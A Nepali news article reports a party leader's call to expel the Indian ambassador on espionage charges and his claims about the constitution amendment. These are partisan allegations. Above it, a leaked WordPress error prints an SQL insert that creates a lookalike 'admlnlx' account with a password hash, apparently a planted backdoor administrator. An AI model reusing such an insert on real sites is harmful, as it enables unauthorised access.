WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BC8HOrKvkzutWuSt7.IzWEjZlzPvKd/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 14:38:11', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर २२–
नेपाल मजदुर किसान पार्टीका अध्यक्ष नारायणमान विजुक्छेंले भारतीय राजदूत रन्जीत रेलाई जासुसीको आरोपमा तत्काल देश निकाला गर्नुपर्ने बताएका छन् ।
संवाद क्लब नेपालले बुधबार राजधानी गरेको अन्तरसंवाद कार्यक्रममा बोल्दै उनले देशमा विखण्डन ल्याउने नियतका साथ भारतीय राजदूतले कूटनीतिक मर्यादा विपरीत गतिविधि गरिरहेको आरोप लागएका छन् । नाकाबन्दीको समयमा भारतका लागि नेपाली राजदूत रहेका नेपाली कांगे्रसका नेता दीपकुमार उपाध्यायलाई तत्कालीन सरकारले असक्षम भनी फिर्ता बोलाएपछि फेरि सोही व्यक्तिलाई राजदूत बनाएर पठाउनु सरकारको नालायकीपन भन्दै उनले भारतमा राजदूत रहँदा नाकाबन्दी खुलाउन विशेष पहल गर्नको साटो चौकी छोडेर भागेको कमाण्डरझै जिम्मेवारी छोडेर भागेको आरोप लगाए ।
संविधान संशोधनको नाममा प्रचण्ड सरकारले भारतीय स्वार्थको पक्षपोषण गरिरहेको भन्दै विजुक्छेंले अहिले पाँच नम्बर प्रदेशबाट पहाडी जिल्लालाई अलग्याएर अन्ततः मधेसवादी नेताबाट तराई एउटा छुट्टै राज्यको माग गर्न लगाएर आन्दोलन चर्काउने र नेपालबाट तराईलाई अलग्याई भारतमा विलय गराउने रणनीति अनुरुप संविधान संशोधनको प्रस्ताव आएको उनको भनाइ छ ।